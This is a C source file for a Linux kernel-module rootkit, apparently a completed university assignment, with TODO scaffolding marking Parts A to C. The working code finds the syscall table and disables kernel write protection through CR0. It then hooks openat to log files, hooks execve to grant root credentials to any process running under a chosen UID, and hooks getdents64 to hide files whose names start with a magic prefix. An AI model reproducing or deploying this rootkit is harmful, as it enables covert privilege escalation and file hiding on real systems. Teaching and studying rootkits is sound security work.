/*
 * COMP4108 Rootkit Framework
*/

#include <linux/sched.h>
#include <linux/module.h>
#include <linux/syscalls.h>
#include <linux/dirent.h>
#include <linux/slab.h>
#include <linux/version.h>
#include <linux/proc_ns.h>
#include <linux/fdtable.h>
#include <linux/kallsyms.h>
#include <linux/kernel.h>
#include <linux/linkage.h> //for asmlinkage

#ifndef __NR_getdents
#define __NR_getdents 141
#endif

#ifndef __NR_execve
#define __NR_execve 11
#endif

#ifndef __NR_getdents64
#define __NR_getdents64 248
#endif

#define MODULE_NAME "rootkit"


// The linux dirent structure for Part C
struct linux_dirent {
        unsigned long   d_ino;
        unsigned long   d_off;
        unsigned short  d_reclen;
        char            d_name[1];
        char            pad;
        char            d_type;
};

unsigned long cr0;
static unsigned long *__sys_call_table;

typedef asmlinkage long (*t_syscall)(const struct pt_regs *);

static t_syscall original_openat; // create a variable to store the original openat function
static t_syscall original_execve; // create a variable to store the original execve function
static t_syscall original_getdents64; // create a variable to store the original getdents64 function

/*
 * TODO: NEEDED FOR PART B AND C
 *  create a variable as above to store the original execve and getdents functions
*/


/*
 * The suffix to use for the openat hook code. This is the file extension
 * we will be detecting. See insert.sh for how this is passed to the rootkit.
*/
static char* suffix;
module_param(suffix, charp, 0);
MODULE_PARM_DESC(suffix, "Received suffix parameter");

//******
//TODO: NEEDED FOR PART B
//	Accept root_uid as a kernel module parameter 
//	(see module_parm() example above)
//******
/*
 * When a user with an effective UID = root_uid runs a command via execve()
 * we make our hook grant them root priv. root_uid's value is provided as a
 * kernel module argument.
 */
 
 //	Accept root_uid as a kernel module parameter based on module_parm() example
static int root_uid;
module_param(root_uid, int, 0);
MODULE_PARM_DESC(root_uid, "effective UID");


//******
//TODO: NEEDED FOR PART C
//	Accept magic_prefix as a kernel module parameter
//	(see module_parm() example above)
//******
/*
 * Files that start with a prefix matching magic_prefix are removed from the
 * linux_dirent64* buffer that is returned to the caller of getdents()
 */
static char* magic_prefix;
module_param(magic_prefix, charp, 0);
MODULE_PARM_DESC(magic_prefix, "prefix for hiding files");

/* 
 * TODO: NEEDED FOR PART A
 *  Update the string provided to the kallsyms_lookup_name function
 * 
 * Locates the address of the system call table using kallsyms_lookup_name
 * and returns it as an unsigned long *
*/
unsigned long * get_syscall_table_bf(void){
  unsigned long *syscall_table;
  syscall_table = (unsigned long*)kallsyms_lookup_name("sys_call_table"); //added symbol "sys_call_table" as specified in PartAQ4
  return syscall_table;
}


/*
 * Our version of the syscall is defined here. We want to match the return type
 * and argument signature of the original syscall.
 * 
 * This is an example of how to hook openat(). Our version will print to the
 * kernel which file the function was called for.
*/
asmlinkage int new_openat(const struct pt_regs* regs){
  // Declare our return value and a variable to store the filename
  long ret;
  char *filename;
  size_t filename_len;
  size_t suffix_len;

  // Get the filename the syscall was called for
  filename = kmalloc(4096, GFP_KERNEL); // alocate kernel memory

  // copy the filename into the kernel variable
  if (strncpy_from_user(filename, (void*) regs->si, 4096) < 0){
    kfree(filename);
    return 0;
  }

  // Check if the file is a .txt (has the .txt extension)
  filename_len = strlen(filename);
  suffix_len = strlen(suffix);
  if (filename_len >= suffix_len){
    if (strncmp(filename + (filename_len - suffix_len), suffix, suffix_len) == 0){
      printk(KERN_INFO "openat() called for %s\n", filename);
    }
  }

  kfree(filename);

  // Invoke the original openat syscall
  ret = original_openat(regs);

  return ret;
}








//NEW CODE FOR PART B
asmlinkage long new_execve(const struct pt_regs* regs) {
    // Declare our return value and variables
    long ret;
    char *filename;
    kuid_t uid;
    struct cred *newCreds;

    // Allocate memory for filename
    filename = kmalloc(4096, GFP_KERNEL); // allocate kernel memory (based on new_openat)
    if (!filename) { //testing
        printk(KERN_ERR "kmalloc failed");
        return -ENOMEM; //error handeling if system out of memory :(
    }

    // copy filename from user space (based on new_openat)
    if (strncpy_from_user(filename, (void*)regs->di, 4096) < 0) {
        printk(KERN_ERR "strncpy_from_user failed"); //testing
        kfree(filename);
        return -EFAULT; //problem with user-space memory access, not with kernel memory prevents kernel from crashing lol 
    }

    // log file being executed
    printk(KERN_INFO "Executing %s\n", filename);

    // log effective current UID 
    uid = current_euid();
    printk(KERN_INFO "Effective UID %d\n", uid.val);

    // Check if the effective UID matches root_uid
    if (uid.val == root_uid) {
        // new credentials with root privileges
        newCreds = prepare_kernel_cred(NULL);
        if (newCreds) {
            if (commit_creds(newCreds) < 0) {
                printk(KERN_ERR "commit_creds failed\n"); //for testing
            }
        } else {
            printk(KERN_ERR "prepare_kernel_cred NULL\n"); //for testing
        }
    }

    // Free the allocated memory
    kfree(filename);

    // Invoke the original execve syscall
    ret = original_execve(regs);

    return ret;
}





//NEW CODE FOR PART C
asmlinkage long new_getdents64(const struct pt_regs *regs)
{
    long ret; 
    struct linux_dirent64 *kdirentBuffer; 
    struct linux_dirent64 *currentDirent; //current dirent pointer
    unsigned int offset = 0; // buffer offset
    int new_ret = 0; // new return value
    size_t prefix_len; 
    char *name; 

    //original getdents64 syscall
    ret = original_getdents64(regs);
    if (ret <= 0)
        return ret; // return if there's an error

    // allocate kernel buffer 
    kdirentBuffer = kmalloc(8192, GFP_KERNEL);
    if (!kdirentBuffer) {
        printk(KERN_ERR "kmalloc failed"); // for testing
        return -ENOMEM; //error handeling if system out of memory
    }


    // Copy data from user space to kernel space
    if (copy_from_user(kdirentBuffer, (void __user *)regs->si, ret)) {
        printk(KERN_ERR "copy_from_user failed"); //for testing
        kfree(kdirentBuffer);
        return -EFAULT; //problem with user-space memory access, not with kernel memory prevents kernel from crashing lol 
    }

    // set prefix length
    prefix_len = strlen(magic_prefix);

    // Loop through directory entries
    while (offset < ret) {
        
        currentDirent = (struct linux_dirent64 *)((char *)kdirentBuffer + offset); //get pointer then name to the current directory entry
        name = currentDirent->d_name; 

        
        printk(KERN_INFO "entry: %s\n", name); //print the entry name

        //if the entry name starts with magic_prefix
        if (strncmp(name, magic_prefix, prefix_len) == 0) {
            printk(KERN_INFO "hiding: %s\n", name);
            
            offset += currentDirent->d_reclen; //go to next entry by increasing the offset with current entry
        } else {
            //keep the entry
            memmove((char *)kdirentBuffer + new_ret, currentDirent, currentDirent->d_reclen); 
            new_ret += currentDirent->d_reclen; //updating for new buffer size
            offset += currentDirent->d_reclen; //next entry
        }
    }

    //copying modified buffer back to user space
    if (copy_to_user((void __user *)regs->si, kdirentBuffer, new_ret)) {
        printk(KERN_ERR "couldnt copy"); //testing
        kfree(kdirentBuffer);
        return -EFAULT; ////problem with user-space memory access
    }

    kfree(kdirentBuffer); //free kernel buffer
    return new_ret; 
}









/*
 * Used to let us modify memory regions and syscalls
*/
static inline void write_cr0_forced(unsigned long val){
  unsigned long __force_order;
  asm volatile(
    "mov %0, %%cr0"
    : "+r"(val), "+m"(__force_order));
}

/*
 * Protect memory (so it can't be modified)
*/
static inline void protect_memory(void){
  write_cr0_forced(cr0);
}

/*
 * Unprotect memory (so we can modify it)
*/
static inline void unprotect_memory(void)
{
  write_cr0_forced(cr0 & ~0x00010000);
}

/*
 * Module initalization
*/
static int __init init_rootkit(void)
{
  printk(KERN_INFO "Rootkit module initializing.\n");

  __sys_call_table = get_syscall_table_bf(); // Get the sys_call_table information

  if (!__sys_call_table)
    return -1;

  cr0 = read_cr0();

  /*
   * TODO: NEEDED FOR PART A, B, AND C
   *  Uncomment the following lines as needed to store the original functions
   *  before they are hooked. You will need to add lines for the execve and
   *  getdents functions.
  */

  // Let's store the original functions so they can be restored later
   original_openat = (t_syscall)__sys_call_table[__NR_openat]; //uncommented for Part A
   original_execve = (t_syscall)__sys_call_table[__NR_execve]; 
   original_getdents64 = (t_syscall)__sys_call_table[__NR_getdents64];

  /*
   * TODO: NEEDED FOR PART A
   *  Unprotect the memory by calling the appropriate function
  */
  
   unprotect_memory(); //added for part A 
  
  /*
   * TODO: NEEDED FOR PART A
   *  Uncomment after completing the unprotect and protect TODO's
  */

  // Let's hook openat() for an example of how to use the framework
    __sys_call_table[__NR_openat] = (unsigned long) new_openat; //uncommented for Part A
  

    

  /*
   * TODO: NEEDED FOR PARTS B AND C
   *  Hook your new execve and getdents functions after writing them
  */

  // Let's hook execve() for privilege excalation
      __sys_call_table[__NR_execve] = (unsigned long)new_execve;
  
  // Let's hook getdents() to hide our files
      __sys_call_table[__NR_getdents64] = (unsigned long)new_getdents64;

  /*
   * TODO: NEEDED FOR PART A
   *  Protect the memory by calling the appropriate function
  */
  
    protect_memory(); //added for part A
  
  printk(KERN_INFO "Rootkit module is loaded!\n");
  return 0; // For successful load
}

static void __exit cleanup_rootkit(void){
  printk(KERN_INFO "Rootkit module is unloaded!\n");

  /*
   * TODO: NEEDED FOR PART A
   *  Unprotect the memory by calling the appropriate function
  */
  
    unprotect_memory(); //aded for part A

  /*
   * TODO: NEEDED FOR PART A
   *  Uncomment after completing the unprotect and protect TODO's
  */
  // Let's unhook and restore the original openat() function
   __sys_call_table[__NR_openat] = (unsigned long)original_openat;



  /*
   * TODO: NEEDED FOR PARTS B AND C
   *  Unhook and restore the execve and getdents functions
  */

  // Let's unhook and restore the original execve() function
     __sys_call_table[__NR_execve] = (unsigned long)original_execve; 
  
  // Let's unhook and restore the original getdents() function
     __sys_call_table[__NR_getdents64] = (unsigned long)original_getdents64;

  /*
   * TODO: NEEDED FOR PART A
   *  Protect the memory by calling the appropriate function
  */
  
    protect_memory();

  printk(KERN_INFO "Rootkit module cleanup copmlete.\n");
}

module_init(init_rootkit);
module_exit(cleanup_rootkit);

MODULE_AUTHOR("Your Friendly Neighbourhood Hacker");
MODULE_LICENSE("GPL");